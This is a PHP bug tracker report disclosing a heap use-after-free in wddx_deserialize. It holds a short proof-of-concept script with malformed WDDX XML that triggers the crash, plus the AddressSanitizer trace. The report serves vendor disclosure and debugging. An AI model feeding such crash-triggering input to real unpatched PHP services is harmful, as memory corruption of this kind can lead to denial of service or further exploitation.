|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2016-09-12 02:33 UTC] stas@php.net
-Status: Open
+Status: Duplicate
[2016-09-12 02:33 UTC] stas@php.net
[2016-09-16 09:25 UTC] stackexploit at gmail dot com
-Status: Duplicate
+Status: Closed
[2016-09-16 09:25 UTC] stackexploit at gmail dot com
[2016-09-18 02:11 UTC] stackexploit at gmail dot com
[2016-09-18 06:15 UTC] stas@php.net
-Assigned To:
+Assigned To: stas
[2017-02-13 01:22 UTC] stas@php.net
-Status: Closed
+Status: Duplicate
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Fri Dec 27 00:01:30 2024 UTC |
Description: ------------ CREDIT ----------------------- This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB. PHP VERSION ----------------------- ./sapi/cli/php --version PHP 7.2.0-dev (cli) (built: Sep 11 2016 18:37:49) ( NTS ) Copyright (c) 1997-2016 The PHP Group Zend Engine v3.1.0-dev, Copyright (c) 1998-2016 Zend Technologies PROOF-OF-CONCEPT FILE ----------------------- Posted in the "Test script" section. STACKTRACE ----------------------- Posted in the "Actual result" section. VULNERABILITY DETAILS ----------------------- An Use-After-Free vulnerability can be triggered in function wddx_deserialize. To reproduce this issue, please run export USE_ZEND_ALLOC=0 before executing the test script. Test script: --------------- <?php $xml = <<<XML <?xml version='1.0'?> <wEdxPacket ver='1.0'><er/> <data> <struct> <recordset rowt='1' fieldNames='keliu'> <field name='keliu'> <var name='php_class_name<binary>'> <string>lab</string> </var> </struct> </data> </jddxPacket> XML; $array = wddx_deserialize($xml); var_dump($array); ?> Expected result: ---------------- Exit quietly. Actual result: -------------- ==47659==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000a4c0 at pc 0x000000ca6599 bp 0x7ffd3028b0e0 sp 0x7ffd3028b0d8 READ of size 4 at 0x60600000a4c0 thread T0 #0 0xca6598 in zval_delref_p php-src/Zend/zend_types.h:834:9 #1 0xca6598 in i_zval_ptr_dtor php-src/Zend/zend_variables.h:47 #2 0xca6598 in _zval_ptr_dtor php-src/Zend/zend_execute_API.c:550 #3 0xac1962 in wddx_stack_destroy php-src/ext/wddx/wddx.c:233:4 #4 0xac1962 in php_wddx_deserialize_ex php-src/ext/wddx/wddx.c:1097 #5 0xabad7a in zif_wddx_deserialize php-src/ext/wddx/wddx.c:1299:2 #6 0xfdfb3d in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER php-src/Zend/zend_vm_execute.h:675:2 #7 0xe75f4b in execute_ex php-src/Zend/zend_vm_execute.h:432:7 #8 0xe76ec3 in zend_execute php-src/Zend/zend_vm_execute.h:474:2 #9 0xd00e9e in zend_execute_scripts php-src/Zend/zend.c:1464:4 #10 0xad4425 in php_execute_script php-src/main/main.c:2537:14 #11 0x10fca26 in do_cli php-src/sapi/cli/php_cli.c:990:5 #12 0x10f9f60 in main php-src/sapi/cli/php_cli.c:1378:18 #13 0x7f540a3b382f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291 #14 0x449578 in _start (php-src/sapi/cli/php+0x449578) 0x60600000a4c0 is located 0 bytes inside of 56-byte region [0x60600000a4c0,0x60600000a4f8) freed by thread T0 here: #0 0x4e9520 in __interceptor_cfree.localalias.0 (php-src/sapi/cli/php+0x4e9520) #1 0xbed9e6 in _efree_56 php-src/Zend/zend_alloc.c:2367:1 #2 0xabad7a in zif_wddx_deserialize php-src/ext/wddx/wddx.c:1299:2 #3 0xfdfb3d in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER php-src/Zend/zend_vm_execute.h:675:2 previously allocated by thread T0 here: #0 0x4e96a8 in __interceptor_malloc (php-src/sapi/cli/php+0x4e96a8) #1 0xbe92a1 in _emalloc_56 php-src/Zend/zend_alloc.c:2325:1 SUMMARY: AddressSanitizer: heap-use-after-free php-src/Zend/zend_types.h:834:9 in zval_delref_p Shadow bytes around the buggy address: 0x0c0c7fff9440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9450: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9460: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9470: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9480: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c0c7fff9490: fa fa fa fa fa fa fa fa[fd]fd fd fd fd fd fd fa 0x0c0c7fff94a0: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa 0x0c0c7fff94b0: fd fd fd fd fd fd fd fa fa fa fa fa 00 00 00 00 0x0c0c7fff94c0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 fa 0x0c0c7fff94d0: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa 0x0c0c7fff94e0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==47659==ABORTING